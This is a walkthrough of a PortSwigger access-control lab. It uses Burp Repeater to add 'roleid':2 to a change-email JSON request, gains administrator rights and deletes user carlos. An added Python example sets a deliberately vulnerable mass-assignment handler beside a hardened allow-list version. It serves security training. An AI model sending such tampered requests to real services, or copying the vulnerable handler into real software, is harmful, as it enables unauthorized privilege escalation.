User role can be modified in user profile
Link: https://portswigger.net/web-security/access-control/lab-user-role-can-be-modified-in-user-profile

We click "Access the lab", and an online store appears with the option to log in under the "My account" tab. We use the login data from the task description.

To keep things organized, I add the page by selecting "Add to scope":

Next, I go to the "Target" > "Scope settings" tab:

I select and edit the page in the "Prefix" column. Before editing:

After editing:

I click "OK" to confirm.
I return to the "Proxy" tab, click on "Filter settings: Hiding CSS, image and general binary content":

I select the option: "Show only in-scope items":

Back in the application, logged in and with Burp proxying in the background, we change the email address of our user:

After pressing "Update mail", we see a POST request to the /my-account/change-email endpoint:

In the "Proxy" > "HTTP history" tab, we can see the response, which includes superfluous information, for example our roleid:

How can we use this information, knowing that roleid = 2 is the administrator account?
Right-click the request in the history and choose "Send to Repeater" (the keyboard shortcut control + command + r does the same):

In the "Repeater" tab we send the modified request, with a roleid field set to 2 added to the JSON body:

POST /my-account/change-email HTTP/2
Host: 0a0900500486a9868b57a9cc0000007f.web-security-academy.net
Cookie: session=Ko7Z7Au4McuM6VcbkHrcGPwB8bVUcLHC
Content-Length: 31
Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120"
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://0a0900500486a9868b57a9cc0000007f.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a0900500486a9868b57a9cc0000007f.web-security-academy.net/my-account?id=wiener
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Priority: u=1, i

{
"email":"wiener@new-user.net",
"roleid":2
}

What do we see in the response? A roleid equal to 2:

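The lab works because the change-email handler binds every field of the JSON body into the stored user record (mass assignment) and then echoes the whole record back, roleid included. The following is an added example, not code from the lab or from PortSwigger: a minimal Python model of such a handler in its vulnerable form beside a hardened form that allow-lists the fields a profile update may change, rejects anything unexpected, and returns only non-sensitive fields. The user record, the role ids and the API key value are constructed for the example; the only values taken from the write-up are the username wiener, the new email address and roleid 2 meaning administrator.

```python
import json

# Constructed role ids; the lab states that roleid 2 is the administrator role.
ROLE_USER = 1
ROLE_ADMIN = 2


def make_user():
    """Constructed sample record for the lab user 'wiener'."""
    return {
        "username": "wiener",
        "email": "wiener@normal-user.net",
        "roleid": ROLE_USER,
        "apikey": "constructed-secret-value",  # hypothetical extra sensitive field
    }


# Constructed copy of the body sent from Repeater in the write-up.
TAMPERED_BODY = '{"email":"wiener@new-user.net","roleid":2}'
NORMAL_BODY = '{"email":"wiener@new-user.net"}'


def change_email_vulnerable(user, raw_body):
    """Vulnerable pattern: every key in the request body is written into the
    record, so a client-supplied roleid silently promotes the user, and the
    full record (roleid, apikey, ...) is echoed back in the response."""
    data = json.loads(raw_body)
    user.update(data)
    return dict(user)


class BadRequest(Exception):
    """Raised for a body that must be refused with a 400-style response."""


# Fields a profile update is allowed to change, and fields safe to echo back.
ALLOWED_FIELDS = {"email"}
PUBLIC_FIELDS = {"username", "email"}


def change_email_hardened(user, raw_body):
    """Hardened pattern: copy only allow-listed fields, reject unexpected ones
    (a useful detection signal rather than something to drop silently), and
    return only fields the client is entitled to see."""
    data = json.loads(raw_body)
    if not isinstance(data, dict):
        raise BadRequest("JSON object expected")
    unexpected = set(data) - ALLOWED_FIELDS
    if unexpected:
        # In a real service this is the line to log and alert on: a profile
        # update carrying roleid/isAdmin-style keys is rarely legitimate.
        raise BadRequest(f"unexpected field(s): {sorted(unexpected)}")
    email = data.get("email")
    if not isinstance(email, str) or "@" not in email or len(email) > 254:
        raise BadRequest("invalid email")
    user["email"] = email
    return {k: user[k] for k in PUBLIC_FIELDS}


def demo():
    """Runs both handlers against the tampered body and reports the resulting
    roleid of each record and whether the hardened handler refused the body."""
    victim = make_user()
    change_email_vulnerable(victim, TAMPERED_BODY)
    protected = make_user()
    try:
        change_email_hardened(protected, TAMPERED_BODY)
        refused = False
    except BadRequest:
        refused = True
    return victim["roleid"], protected["roleid"], refused


if __name__ == "__main__":
    print(demo())  # vulnerable record is now roleid 2, hardened one stays roleid 1
```

Whether to reject or merely ignore unknown keys is a design choice; ignoring is friendlier to clients that send extra fields, but rejecting turns the tampering attempt into a logged error that a detection rule can pick up, and either way the role field must never be writable through this endpoint.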
We refresh the page in the application to check the result:
We go to the admin panel and delete the user carlos:
Lab completed:
